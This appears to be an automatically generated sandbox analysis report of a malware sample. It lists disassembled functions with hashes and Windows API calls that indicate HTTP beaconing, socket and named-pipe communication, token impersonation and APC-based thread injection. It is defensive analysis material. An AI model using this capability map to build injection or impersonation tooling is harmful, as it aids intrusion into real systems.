                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0a7232b9ed9669d881f4893b4c8615f0ca151278e9e7f5d9bb8b2fa9bed21a24
                            • Instruction ID: ee2310002b63b9cc1ea82e3fd0c83cabff4963a59b9b5bec4ac5a57f28e3bb07
                            • Opcode Fuzzy Hash: 0a7232b9ed9669d881f4893b4c8615f0ca151278e9e7f5d9bb8b2fa9bed21a24
                            • Instruction Fuzzy Hash: 6E91BF78E0020ADFCF08CF89C5909EDBBB1BF48315F248199D8566B355D734AA81CFA6
                            Function 00D7AC70 Relevance: .2, Instructions: 182COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0a7232b9ed9669d881f4893b4c8615f0ca151278e9e7f5d9bb8b2fa9bed21a24
                            • Instruction ID: 0f3cc21bad1efbeea8bcc2402dc144707e06a34cff18369b95d10f8045d6f4f6
                            • Opcode Fuzzy Hash: 0a7232b9ed9669d881f4893b4c8615f0ca151278e9e7f5d9bb8b2fa9bed21a24
                            • Instruction Fuzzy Hash: 8891B074E00209DFCF18CF89C5909ADBBB1BF88315F24C199E8556B315E334AA81CFA6
                            Function 00D79FA0 Relevance: .2, Instructions: 182COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0a7232b9ed9669d881f4893b4c8615f0ca151278e9e7f5d9bb8b2fa9bed21a24
                            • Instruction ID: eff622927b6328376c163afcf9c2cc03ede3584e4352a5c5ebe2d5867e2a7dd5
                            • Opcode Fuzzy Hash: 0a7232b9ed9669d881f4893b4c8615f0ca151278e9e7f5d9bb8b2fa9bed21a24
                            • Instruction Fuzzy Hash: 2391BF74E0020ADFCF08CF89C5909AEBBB1BF88315F24C199D815AB315D335AA41CFA6
                            Function 00D8282F Relevance: .1, Instructions: 123COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ff2b6f834b16b78025c083963c8e988e93abbc0d3e50f43d867b2c402f0a1f38
                            • Instruction ID: 82954a7b4b728540b7ee90e9090fdd0b9fccebb58dfa892c8e70b5cfc6a053b7
                            • Opcode Fuzzy Hash: ff2b6f834b16b78025c083963c8e988e93abbc0d3e50f43d867b2c402f0a1f38
                            • Instruction Fuzzy Hash: 9C41DD76D042A10ECF1ABB788C511BDBFF1FF2A72075A15AAD0D6EA343D5108581DBB4
                            Function 00DC59E9 Relevance: .1, Instructions: 120COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _malloc
                            • String ID:
                            • API String ID: 1579825452-0
                            • Opcode ID: 2de99cd372809c886073451b6248ffc06870ab6b4f6c49016a89b208377a13cc
                            • Instruction ID: e523289832bd5ea69f6e54daa715cf98603feb4841b9c4331ee0421d389ff57b
                            • Opcode Fuzzy Hash: 2de99cd372809c886073451b6248ffc06870ab6b4f6c49016a89b208377a13cc
                            • Instruction Fuzzy Hash: 8E413CB2E0020AAFDB04DFA9D881BAEB7B5EF48310F19816DE905E7345D634ED41DB60
                            Function 00D84DE9 Relevance: .1, Instructions: 120COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _malloc
                            • String ID:
                            • API String ID: 1579825452-0
                            • Opcode ID: 2de99cd372809c886073451b6248ffc06870ab6b4f6c49016a89b208377a13cc
                            • Instruction ID: cd9c800b350a829c12c456d56206356295ebf6c52889aa033d970f161b3c11e6
                            • Opcode Fuzzy Hash: 2de99cd372809c886073451b6248ffc06870ab6b4f6c49016a89b208377a13cc
                            • Instruction Fuzzy Hash: 1C411CB6E0020AAFDB04DFA8C881AAEB7B5FF48310F15816DE905E7345D774AD018B60
                            Function 00DD7945 Relevance: .1, Instructions: 90COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 40d8af6ddd94688b72605046ddb6f72551a02b4cee13cb77aaae89ab7b456c96
                            • Instruction ID: 0901f5e4c5bce1b5545589644eda22f9aefbdf66cda22a16593b84d5d0034a63
                            • Opcode Fuzzy Hash: 40d8af6ddd94688b72605046ddb6f72551a02b4cee13cb77aaae89ab7b456c96
                            • Instruction Fuzzy Hash: D441C4759101688FCF48CF9DE8D48EDBBF2FB8D341B45811AE542AB395C638A950CB34
                            Function 00D96D45 Relevance: .1, Instructions: 90COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 40ac596cf5526f95ef1f466b5cf0f103403ad38103e58a0c2d3626243e9624f4
                            • Instruction ID: 4d04bcd3cfa1cf7c557f6d800d88bc0481c994f7f24cb260750b3e84cb4f3cf1
                            • Opcode Fuzzy Hash: 40ac596cf5526f95ef1f466b5cf0f103403ad38103e58a0c2d3626243e9624f4
                            • Instruction Fuzzy Hash: 3141A4749101688FDF49CF5DE8E08EDBBF2FB8D341B45811AE542BB396C638A910DB20
                            Function 00DB8B1A Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 210networkCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • htonl.WS2_32(?), ref: 00DB8B54
                            • select.WS2_32(00000000,?,?,?,?), ref: 00DB8BB8
                            • __WSAFDIsSet.WS2_32(00000000,?), ref: 00DB8BD4
                            • accept.WS2_32(00000000,00000000,00000000), ref: 00DB8BE9
                            • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 00DB8BFC
                              • Part of subcall function 00DB8520: _malloc.LIBCMT ref: 00DB8527
                              • Part of subcall function 00DB8520: GetTickCount.KERNEL32 ref: 00DB8547
                              • Part of subcall function 00DB16CB: _malloc.LIBCMT ref: 00DB16D1
                              • Part of subcall function 00DB171B: htonl.WS2_32(0000001F), ref: 00DB1721
                              • Part of subcall function 00DB1864: _memset.LIBCMT ref: 00DB1872
                            • __WSAFDIsSet.WS2_32(00000000,?), ref: 00DB8C89
                            • accept.WS2_32(00000000,00000000,00000000), ref: 00DB8C9B
                            • closesocket.WS2_32(?), ref: 00DB8DA9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _mallocaccepthtonl$CountTick_memsetclosesocketioctlsocketselect
                            • String ID: d
                            • API String ID: 4083423528-2564639436
                            • Opcode ID: bc103241b8e96befb43764d9cf0043f1254703e56a3f52022a9a4d1873ff9630
                            • Instruction ID: 451eb5bb1a47260c44d893d4ed87a79b0a140103c0356e0637f5786351e7c0db
                            • Opcode Fuzzy Hash: bc103241b8e96befb43764d9cf0043f1254703e56a3f52022a9a4d1873ff9630
                            • Instruction Fuzzy Hash: 68711C71800608EFDB21EFA5DC45ADEBBBCEB54310F1445ABE956E3291EB309A44DB70
                            Function 00DB2962 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 196networksleepCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00DB298D
                            • _memset.LIBCMT ref: 00DB29A2
                            • __snprintf.LIBCMT ref: 00DB2A0E
                            • _memset.LIBCMT ref: 00DB2A1C
                            • __snprintf.LIBCMT ref: 00DB2A3A
                            • __snprintf.LIBCMT ref: 00DB2A59
                            • __snprintf.LIBCMT ref: 00DB2AF7
                            • __snprintf.LIBCMT ref: 00DB2B0E
                            • HttpOpenRequestA.WININET(00000000,?,00000000,00000000,00DE1540,00DEFFC4), ref: 00DB2B4B
                            • HttpSendRequestA.WININET(00000000,?,?,?,?), ref: 00DB2B74
                            • InternetCloseHandle.WININET(00000000), ref: 00DB2B86
                            • Sleep.KERNEL32(000001F4), ref: 00DB2B8D
                            • InternetCloseHandle.WININET(00000000), ref: 00DB2B9E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: __snprintf$_memset$CloseHandleHttpInternetRequest$OpenSendSleep
                            • String ID: %s%s$*/*
                            • API String ID: 3375730287-856325523
                            • Opcode ID: 520701835c939000656ab4db097b5b054e1a3ed18aa6f11b911689524fcbd1e0
                            • Instruction ID: 833ad3be4f4b3a916c6af0051c82ec982080a82fd2d2bf2a0d67dbef3d3c8875
                            • Opcode Fuzzy Hash: 520701835c939000656ab4db097b5b054e1a3ed18aa6f11b911689524fcbd1e0
                            • Instruction Fuzzy Hash: 9061B272900259EFDB11ABA4DC85EFE7BB9FF05304F0400A6F606A7212DB319E498B75
                            Function 00DB2962 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 196networksleepCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: __snprintf$_memset$HttpRequest$OpenSendSleep
                            • String ID: %s%s$*/*
                            • API String ID: 211597586-856325523
                            • Opcode ID: 0e8e5819ab4ac94f711b280d2c462ac47750f95f73deca21dc1ae3b3ad1e2778
                            • Instruction ID: 833ad3be4f4b3a916c6af0051c82ec982080a82fd2d2bf2a0d67dbef3d3c8875
                            • Opcode Fuzzy Hash: 0e8e5819ab4ac94f711b280d2c462ac47750f95f73deca21dc1ae3b3ad1e2778
                            • Instruction Fuzzy Hash: 9061B272900259EFDB11ABA4DC85EFE7BB9FF05304F0400A6F606A7212DB319E498B75
                            Function 00DB4870 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 184processCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00DB489E
                            • _memset.LIBCMT ref: 00DB48BA
                              • Part of subcall function 00DB31C8: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000400,00DB4ACB,?,00DB48E4,00DB4ACB,?,00000400), ref: 00DB31DE
                              • Part of subcall function 00DB31C8: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00DB4ACB,00DB48E4,?,00DB48E4,00DB4ACB,?,00000400,?,?,?,?,00DB4ACB), ref: 00DB31F7
                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00DB4ACB,?,?,?,00DB9320), ref: 00DB4904
                            • GetCurrentDirectoryW.KERNEL32(00000400,?,?,?,?,?,?,?,?,00DB4ACB,?,?,?,00DB9320), ref: 00DB4913
                            • CreateProcessWithTokenW.ADVAPI32(00000002,00000000,?,C0330CC4,00000000,?,C3E8296A,83FFFFDB), ref: 00DB4946
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharCurrentDirectoryMultiWide_memset$CreateProcessTokenWith
                            • String ID: sysnative$system32
                            • API String ID: 2486443368-2461298002
                            • Opcode ID: 10792a0f4286fa8aa09d3cb9169d2872d3cf3f64d47901b62f7437a7188a687e
                            • Instruction ID: 098e20b5ccb69cc2b6a406492823cce3200a500d3df74ee8084aff5b8ff6f814
                            • Opcode Fuzzy Hash: 10792a0f4286fa8aa09d3cb9169d2872d3cf3f64d47901b62f7437a7188a687e
                            • Instruction Fuzzy Hash: E951D372604345EFD721EF64DC85EEB77E9EF85314F14082AE58AC7212EA31D9088B75
                            Function 00DB79AC Relevance: 18.1, APIs: 12, Instructions: 94pipesleepfileCOMMON
                            Download Yara Rule
                            APIs
                            • GetTickCount.KERNEL32 ref: 00DB79BB
                            • GetTickCount.KERNEL32 ref: 00DB79C5
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00100000,00000000), ref: 00DB79DF
                            • GetLastError.KERNEL32 ref: 00DB79EC
                            • WaitNamedPipeA.KERNEL32(?,00002710), ref: 00DB7A01
                            • Sleep.KERNEL32(000003E8), ref: 00DB7A0E
                            • GetTickCount.KERNEL32 ref: 00DB7A14
                            • GetLastError.KERNEL32 ref: 00DB7A2A
                            • GetLastError.KERNEL32 ref: 00DB7A3A
                            • SetNamedPipeHandleState.KERNEL32(?,?,00000000,00000000), ref: 00DB7A58
                            • GetLastError.KERNEL32 ref: 00DB7A62
                            • DisconnectNamedPipe.KERNEL32(?), ref: 00DB7A9C
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$CountNamedPipeTick$CreateDisconnectFileHandleSleepStateWait
                            • String ID:
                            • API String ID: 34948862-0
                            • Opcode ID: e8d41e175776ac855918c3e71b9abf45a6f7486e17e9dc2388c0ed026aa108f1
                            • Instruction ID: a2a5aab4758796897123a698e6082dd1bf037c42d6964077f211c45f32ba0aad
                            • Opcode Fuzzy Hash: e8d41e175776ac855918c3e71b9abf45a6f7486e17e9dc2388c0ed026aa108f1
                            • Instruction Fuzzy Hash: A021B531608309EBEB516BB49C86BFE379DAB85724F210427F61BE61D1EB605A404671
                            Function 00DB8919 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 69networkCOMMON
                            Download Yara Rule
                            APIs
                            • GetTickCount.KERNEL32 ref: 00DB892A
                            • select.WS2_32(00000000,00000000,?,?,00000000), ref: 00DB8975
                            • __WSAFDIsSet.WS2_32(?,?), ref: 00DB8985
                            • __WSAFDIsSet.WS2_32(?,?), ref: 00DB8998
                            • GetTickCount.KERNEL32 ref: 00DB89A1
                            • gethostbyname.WS2_32(?), ref: 00DB89AC
                            • htons.WS2_32(?), ref: 00DB89BF
                            • inet_addr.WS2_32(?), ref: 00DB89CB
                            • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 00DB89E5
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CountTick$gethostbynamehtonsinet_addrselectsendto
                            • String ID: d
                            • API String ID: 1257931466-2564639436
                            • Opcode ID: 60de7127a2569c6982c6801e6b43fe11902c5454986afb80b1961dbb2ace13fe
                            • Instruction ID: bd92605dc3836defcdab63837cea2680fe4d6ee2628ebaa732671640b54cb5e9
                            • Opcode Fuzzy Hash: 60de7127a2569c6982c6801e6b43fe11902c5454986afb80b1961dbb2ace13fe
                            • Instruction Fuzzy Hash: D1214C71900309EBDF119F90DC45BEE7BB9EF08311F1000A7E905E6291EB71DA55AFA1
                            Function 00DBE114 Relevance: 16.6, APIs: 11, Instructions: 122COMMON
                            Download Yara Rule
                            APIs
                            • htonl.WS2_32 ref: 00DBE13C
                            • htonl.WS2_32(?), ref: 00DBE14C
                            • GetLastError.KERNEL32 ref: 00DBE176
                            • OpenProcessToken.ADVAPI32(00000000,00000000,00000008), ref: 00DBE19A
                            • GetLastError.KERNEL32 ref: 00DBE1A4
                            • ImpersonateLoggedOnUser.ADVAPI32(00000008), ref: 00DBE1C3
                            • GetLastError.KERNEL32 ref: 00DBE1C9
                            • DuplicateTokenEx.ADVAPI32(00000008,02000000,00000000,00000003,00000001,00DF08A4), ref: 00DBE1E8
                            • GetLastError.KERNEL32 ref: 00DBE1F2
                            • ImpersonateLoggedOnUser.ADVAPI32 ref: 00DBE204
                            • GetLastError.KERNEL32 ref: 00DBE20A
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$ImpersonateLoggedTokenUserhtonl$DuplicateOpenProcess
                            • String ID:
                            • API String ID: 332438066-0
                            • Opcode ID: 940b190c56af7eead9bbcfb956c25caf8f04b4225f31c599dc4bdaa94c7ab40a
                            • Instruction ID: 57953672c2210bc57074f3a9965a1fb399c7b08bf48472aee7509d627c487cc0
                            • Opcode Fuzzy Hash: 940b190c56af7eead9bbcfb956c25caf8f04b4225f31c599dc4bdaa94c7ab40a
                            • Instruction Fuzzy Hash: E431B575904309FBEB106BA5DC49FFA3BBDDF41799F28402AF603D6191EB7089048A71
                            Function 00D8CD61 Relevance: 16.6, APIs: 11, Instructions: 105COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: __encode_pointer$__decode_pointer$__calloc_crt__crt_waiting_on_module_handle__init_pointers__initptd__mtterm
                            • String ID:
                            • API String ID: 3005113738-0
                            • Opcode ID: f4f16914d6c516e466c7836a4cd309be2a1a7730aeb4c8532e1b1462738c008c
                            • Instruction ID: 94bebc15a2b9fba62c64b6f1ca3147eb08032258fcc6b53ad2b962054e8e5c4f
                            • Opcode Fuzzy Hash: f4f16914d6c516e466c7836a4cd309be2a1a7730aeb4c8532e1b1462738c008c
                            • Instruction Fuzzy Hash: BA313371850728EFFB12BF7A9CC6A193BA4EB05720B15262AF514DB1B2EB358441DF70
                            Function 00DB8853 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 59networksleepCOMMON
                            Download Yara Rule
                            APIs
                            • GetTickCount.KERNEL32 ref: 00DB8864
                            • select.WS2_32(00000000,00000000,?,?,00000000), ref: 00DB88B2
                            • __WSAFDIsSet.WS2_32(?,?), ref: 00DB88C2
                            • __WSAFDIsSet.WS2_32(?,?), ref: 00DB88D5
                            • send.WS2_32(?,00000000,?,00000000), ref: 00DB88E9
                            • WSAGetLastError.WS2_32(?,00000000,?,00000000,?,?,?,?), ref: 00DB88F3
                            • Sleep.KERNEL32(000003E8), ref: 00DB8905
                            • GetTickCount.KERNEL32 ref: 00DB890B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CountTick$ErrorLastSleepselectsend
                            • String ID: d
                            • API String ID: 2152284305-2564639436
                            • Opcode ID: 264b56dc4c07975da55f2ab3c7a5883d1d9d985ca410aa1de41777f1df7fba94
                            • Instruction ID: ad72b82b333915dd9287dad4c560401fd23fb128bf38bb334237de21f2ed918b
                            • Opcode Fuzzy Hash: 264b56dc4c07975da55f2ab3c7a5883d1d9d985ca410aa1de41777f1df7fba94
                            • Instruction Fuzzy Hash: 0611903184020DEBDF119F64DC85BE97BBCFB08314F1001A7E615D21A0EBB09E819FA0
                            Function 00DB3741 Relevance: 15.1, APIs: 10, Instructions: 103sleepfilepipeCOMMON
                            Download Yara Rule
                            APIs
                            • GetTickCount.KERNEL32 ref: 00DB3757
                            • GetLastError.KERNEL32 ref: 00DB37B7
                            • GetTickCount.KERNEL32 ref: 00DB37C2
                            • Sleep.KERNEL32(000003E8), ref: 00DB37CD
                            • GetLastError.KERNEL32 ref: 00DB37D9
                            • WriteFile.KERNEL32(?,?,00000004,?,00000000), ref: 00DB380B
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00DB3836
                            • FlushFileBuffers.KERNEL32(?), ref: 00DB384A
                            • DisconnectNamedPipe.KERNEL32(?), ref: 00DB3853
                            • Sleep.KERNEL32(000003E8), ref: 00DB3866
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CountErrorLastSleepTickWrite$BuffersDisconnectFlushNamedPipe
                            • String ID:
                            • API String ID: 3101085627-0
                            • Opcode ID: 025b19708d78a27d441bb2671cdb6a4e8a64585d7640623aa128e677628c9b55
                            • Instruction ID: 203481af661b36872f218c4ada17c487b8556bc08f153c7260eeea54ebb49ce8
                            • Opcode Fuzzy Hash: 025b19708d78a27d441bb2671cdb6a4e8a64585d7640623aa128e677628c9b55
                            • Instruction Fuzzy Hash: 0C3108B6D00219EBDB01EBA4DC86AEEB7B8EB04714F150066E506E6250DB31AF44DBB1
                            Function 00DB66BF Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 111threadsleepprocessCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll,NtQueueApcThread,00000000,00000000), ref: 00DB6704
                            • GetProcAddress.KERNEL32(00000000), ref: 00DB670B
                              • Part of subcall function 00DB6638: _malloc.LIBCMT ref: 00DB6657
                            • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00DB673A
                            • Thread32First.KERNEL32(00000000,0000001C), ref: 00DB674F
                            • Thread32Next.KERNEL32(00000000,0000001C), ref: 00DB678E
                            • Sleep.KERNEL32(000000C8,00000004,00000000), ref: 00DB67A4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: Thread32$AddressCreateFirstHandleModuleNextProcSleepSnapshotToolhelp32_malloc
                            • String ID: NtQueueApcThread$ntdll
                            • API String ID: 147937454-1374908105
                            • Opcode ID: cc9833fae7d3854cbad68c726a09c08cce2d0b1d5ca6d1e5fc6aeabfae91eea4
                            • Instruction ID: a022d3b8154c9726d31ef27e7feabc5d63def82f0586663edb8f3dbdc31cb8e8
                            • Opcode Fuzzy Hash: cc9833fae7d3854cbad68c726a09c08cce2d0b1d5ca6d1e5fc6aeabfae91eea4
                            • Instruction Fuzzy Hash: 9C314775900219FFDF10EFA4C845AEEBBB9EB08714F144426F906E6150EB74DA45CBB1
                            Function 00DB5EEC Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 73COMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00DB5EFC
                            • _memset.LIBCMT ref: 00DB5F08
                              • Part of subcall function 00DB6072: _malloc.LIBCMT ref: 00DB60C4
                              • Part of subcall function 00DB6072: _malloc.LIBCMT ref: 00DB60CF
                              • Part of subcall function 00DB6072: _memset.LIBCMT ref: 00DB60DB
                              • Part of subcall function 00DB6072: _memset.LIBCMT ref: 00DB60E6
                              • Part of subcall function 00DB6072: _rand.LIBCMT ref: 00DB6144
                            • __snprintf.LIBCMT ref: 00DB5F59
                            • __snprintf.LIBCMT ref: 00DB5F71
                            • _memset.LIBCMT ref: 00DB5F90
                            • _memset.LIBCMT ref: 00DB5F9B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset$__snprintf_malloc$_rand
                            • String ID: %s&%s$?%s
                            • API String ID: 1876596931-1750478248
                            • Opcode ID: b8394719dd5a92acecc9e45d60fa2e69254bb31a621b3eaa4ca2e4536e1a73dd
                            • Instruction ID: d6f9107a863d9bfa78d0a50161de54951e1427ed9216119fb9c2a2a6f630f863
                            • Opcode Fuzzy Hash: b8394719dd5a92acecc9e45d60fa2e69254bb31a621b3eaa4ca2e4536e1a73dd
                            • Instruction Fuzzy Hash: 46217C71500100FBDF15AE11EC42FAB7B69EF95710F244085FD016B297E670EE11CAB5
                            Function 00DB5EEC Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 73COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00DB5EFC
                            • _memset.LIBCMT ref: 00DB5F08
                              • Part of subcall function 00DB6072: _malloc.LIBCMT ref: 00DB60C4
                              • Part of subcall function 00DB6072: _malloc.LIBCMT ref: 00DB60CF
                              • Part of subcall function 00DB6072: _memset.LIBCMT ref: 00DB60DB
                              • Part of subcall function 00DB6072: _memset.LIBCMT ref: 00DB60E6
                              • Part of subcall function 00DB6072: _rand.LIBCMT ref: 00DB6144
                            • __snprintf.LIBCMT ref: 00DB5F59
                            • __snprintf.LIBCMT ref: 00DB5F71
                            • _memset.LIBCMT ref: 00DB5F90
                            • _memset.LIBCMT ref: 00DB5F9B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset$__snprintf_malloc$_rand
                            • String ID: %s&%s$?%s
                            • API String ID: 1876596931-1750478248
                            • Opcode ID: 85f1f7033f5375ac6f298d3c1cbd3d9a04bc354981ebd5e4a237038a9953ee7c
                            • Instruction ID: d6f9107a863d9bfa78d0a50161de54951e1427ed9216119fb9c2a2a6f630f863
                            • Opcode Fuzzy Hash: 85f1f7033f5375ac6f298d3c1cbd3d9a04bc354981ebd5e4a237038a9953ee7c
                            • Instruction Fuzzy Hash: 46217C71500100FBDF15AE11EC42FAB7B69EF95710F244085FD016B297E670EE11CAB5
                            Function 00DBC35D Relevance: 13.8, APIs: 9, Instructions: 273COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81C2
                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81D2
                            • _memset.LIBCMT ref: 00DBC3CE
                              • Part of subcall function 00DBC7BA: _memset.LIBCMT ref: 00DBC8B6
                            • _malloc.LIBCMT ref: 00DBC3E1
                              • Part of subcall function 00DC87FF: __FF_MSGBANNER.LIBCMT ref: 00DC8822
                              • Part of subcall function 00DC87FF: __NMSG_WRITE.LIBCMT ref: 00DC8829
